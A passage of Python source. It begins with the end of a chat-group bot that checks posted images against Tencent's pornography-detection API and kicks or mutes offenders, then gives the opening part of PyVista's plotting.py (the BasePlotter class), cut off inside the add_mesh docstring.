def distinguish(data: str, md5: str):
while True:
try:
body = {
'app_id': APP_ID,
'time_stamp': int(time.time()),
'nonce_str': md5,
'image': data
}
body['sign'] = sign(body)
rsp = requests.post(url='https://api.ai.qq.com/fcgi-bin/vision/vision_porn',
data=body,
headers={'Content-Type': 'application/x-www-form-urlencoded'}).json()
result = {}
if rsp['ret'] == 0:
for v in rsp['data']['tag_list']:
result[v['tag_name']] = v['tag_confidence']
return result
except Exception as e:
print('鉴黄出错', e, "5秒后重试")
time.sleep(5)
def main():
while True:
try:
while not q.empty():
time.sleep(3)
task = q.get()
result = distinguish(*compress(task['file']))
print(f'识别结果 用户{task["user_id"]} 色情{result["porn"]}% 性感{result["hot"]}% 综合{result["normal_hot_porn"]}%')
for rule in rules:
tag = rule['tag_name']
percent = result[tag]
if rule['tag_min'] <= percent <= rule['tag_max']:
message = "[CQ:at,qq={}]\n识别到本图片为违规的概率为{}%\n给予{}处分\n若有误报, 请联系管理"
punishment = ""
if rule['punishment']['p'] == 'kick':
punishment = '移出本群'
bot.set_group_kick(group_id=task['group_id'], user_id=task['user_id'],
reject_add_request=rule['punishment']['reject'])
if rule['punishment']['p'] == 'ban':
punishment = '禁言' + str(rule['punishment']['times'] / 24 * 60 * 60)
bot.set_group_ban(group_id=task['group_id'], user_id=task['user_id'],
duration=rule['punishment']['times'])
bot.send_group_msg(group_id=task['group_id'],
message=message.format(task['user_id'], percent, punishment))
except Exception as e:
print(e)
threading.Thread(target=main).start()
bot.run(host=bot_host, port=bot_port)
|
plotting.py
|
"""Pyvista plotting module."""
import collections
import logging
import os
import time
import warnings
from functools import wraps
from threading import Thread
import imageio
import numpy as np
import vtk
from vtk.util import numpy_support as VN
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy
import pyvista
import scooby
from pyvista.utilities import (assert_empty_kwargs,
convert_array, convert_string_array, get_array,
is_pyvista_dataset, numpy_to_texture,
raise_not_matching, try_callback, wrap)
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .renderer import Renderer
from .background_renderer import BackgroundRenderer
from .theme import (FONT_KEYS, MAX_N_COLOR_BARS, parse_color,
parse_font_family, rcParams)
from .tools import normalize, opacity_transfer_function
from .widgets import WidgetHelper
try:
import matplotlib
has_matplotlib = True
except ImportError:
has_matplotlib = False
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory."""
for key, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
Window title of the scalar bar
"""
mouse_position = None
click_position = None
def __new__(cls, *args, **kwargs):
"""Create an instance of base plotter."""
if cls is BasePlotter:
raise TypeError("pyvista.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None):
"""Initialize base plotter."""
self.image_transparent_background = rcParams['transparent_background']
self.mesh = None
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self._active_renderer_index = 0
self.renderers = []
if isinstance(shape, str):
if '|' in shape:
n = int(shape.split('|')[0])
m = int(shape.split('|')[1])
rangen = reversed(range(n))
rangem = reversed(range(m))
else:
m = int(shape.split('/')[0])
n = int(shape.split('/')[1])
rangen = range(n)
rangem = range(m)
if splitting_position is None:
splitting_position = rcParams['multi_rendering_splitting_position']
if splitting_position is None:
if n >= m:
xsplit = m/(n+m)
else:
xsplit = 1-n/(n+m)
else:
xsplit = splitting_position
for i in rangen:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(0, i/n, xsplit, (i+1)/n)
else:
arenderer.SetViewport(i/n, 0, (i+1)/n, xsplit)
self.renderers.append(arenderer)
for i in rangem:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(xsplit, i/m, 1, (i+1)/m)
else:
arenderer.SetViewport(i/m, xsplit, (i+1)/m, 1)
self.renderers.append(arenderer)
self.shape = (n+m,)
else:
assert_str = '"shape" should be a list, tuple or string descriptor'
assert isinstance(shape, collections.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
# each render will also have an associated background renderer
self._background_renderers = [None for _ in range(len(self.renderers))]
# This keeps track of scalars names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = vtk.vtkInteractorStyleRubberBandPick()
# this helps managing closed plotters
self._closed = False
# Add self to open plotters
self._id_name = "{}-{}".format(str(hex(id(self))), len(_ALL_PLOTTERS))
_ALL_PLOTTERS[self._id_name] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
# Key bindings
self.reset_key_events()
#### Manage the active Renderer ####
def loc_to_index(self, loc):
"""Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Return
------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.Iterable):
if not len(loc) == 2:
raise AssertionError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
return idxs[index_row, index_column]
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid."""
if len(self.shape) == 1:
return index
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.')
return args[0]
@property
def renderer(self):
"""Return the active renderer."""
return self.renderers[self._active_renderer_index]
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
"""
if len(self.shape) == 1:
self._active_renderer_index = index_row
return
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
self._active_renderer_index = self.loc_to_index((index_row, index_column))
#### Wrap Renderer methods ####
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
self.renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, **kwargs):
"""Wrap ``Renderer.set_focus``."""
self.renderer.set_focus(*args, **kwargs)
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
self.render()
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounds_axes)
def add_bounds_axes(self, *args, **kwargs):
"""Wrap ``add_bounds_axes``."""
return self.renderer.add_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
return self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
return self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
return self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
return self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
return self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
return self.renderer.view_yx(*args, **kwarg)
@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
return self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
return self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
return self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
return self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
return self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
return self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, actor, reset_camera=False):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
return self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the first render window."""
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
#### Properties of the BasePlotter ####
@property
def window_size(self):
"""Return the render window size."""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
@property
def image(self):
"""Return an image array of current render window."""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
#### Everything else ####
def render(self):
"""Render the main window.
If this is called before ``show()``, nothing will happen.
"""
if hasattr(self, 'ren_win') and not self._first_time:
self.ren_win.Render()
# Not sure if this is ever needed but here as a reminder
# if hasattr(self, 'iren') and not self._first_time:
# self.iren.Render()
return
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed.
These are non-unique - thus a key could map to many callback
functions. The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
def _add_observer(self, event, call):
if hasattr(self, 'iren'):
self._observers[event] = self.iren.AddObserver(event, call)
def _remove_observer(self, event):
if hasattr(self, 'iren') and event in self._observers:
self.iren.RemoveObserver(event)
del self._observers[event]
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key."""
self._key_press_event_callbacks.pop(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.GetEventPosition()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.GetEventPosition()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks supported
here - use :func:`pyvista.BasePlotter.track_click_position` instead.
"""
if hasattr(self, "iren"):
self._add_observer(vtk.vtkCommand.MouseMoveEvent,
self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self._remove_observer(vtk.vtkCommand.MouseMoveEvent)
def track_click_position(self, callback=None, side="right",
viewport=False):
"""Keep track of the click position.
By default, it only tracks right clicks.
Parameters
----------
callback : callable
A callable method that will use the click position. Passes the
click position as a length two tuple.
side : str
The side of the mouse for the button to track (left or right).
Default is left. Also accepts ``'r'`` or ``'l'``.
viewport: bool
If ``True``, uses the normalized viewport coordinate system
(values between 0.0 and 1.0 and support for HiDPI) when passing the
click position to the callback
"""
if not hasattr(self, "iren"):
return
side = str(side).lower()
if side in ["right", "r"]:
event = vtk.vtkCommand.RightButtonPressEvent
elif side in ["left", "l"]:
event = vtk.vtkCommand.LeftButtonPressEvent
else:
raise TypeError("Side ({}) not supported. Try `left` or `right`".format(side))
def _click_callback(obj, event):
self.store_click_position()
if hasattr(callback, '__call__'):
if viewport:
try_callback(callback, self.click_position)
else:
try_callback(callback, self.pick_click_position())
self._add_observer(event, _click_callback)
def untrack_click_position(self):
"""Stop tracking the click position."""
if hasattr(self, "_click_observer"):
self.iren.RemoveObserver(self._click_observer)
del self._click_observer
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size and
line width by the given value.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self._add_observer('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('f', self.fly_to_mouse_position)
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
def key_press_event(self, obj, event):
"""Listen for key press event."""
try:
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
self._last_key = key
if key in self._key_press_event_callbacks.keys():
# Note that defaultdict's will never throw a key error
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
except Exception as e:
log.error('Exception encountered for keypress "%s": %s' % (key, e))
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
"""Update the camera interactor style."""
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
"""Set the interactive style to trackball camera.
The trackball camera is the default interactor style.
"""
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_trackball_actor_style(self):
"""Set the interactive style to trackball actor.
This allows to rotate actors around the scene.
"""
self._style = vtk.vtkInteractorStyleTrackballActor()
return self.update_style()
def enable_image_style(self):
"""Set the interactive style to image.
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
def enable_joystick_style(self):
"""Set the interactive style to joystick.
It allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse if not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
"""Set the interactive style to rubber band zoom.
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
"""Set the interactive style to terrain.
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
"""Set the interactive style to rubber band picking.
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
return
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
return
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self.render()
Plotter.last_update_time = curr_time
elif force_redraw:
self.render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
culling=None, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a siblge float value is given, it will be
the global opacity of the mesh and uniformly applied everywhere -
should be between 0 and 1. A string can also be specified to map
the scalars range to a predefined opacity transfer function
(options include: 'linear', 'linear_r', 'geom', 'geom_r').
A string could also be used to map a scalars array from the mesh to
the opacity (must have same number of elements as the
``scalars`` argument). Or you can pass a custum made transfer
function that is an array either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
result is showing colors that are not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
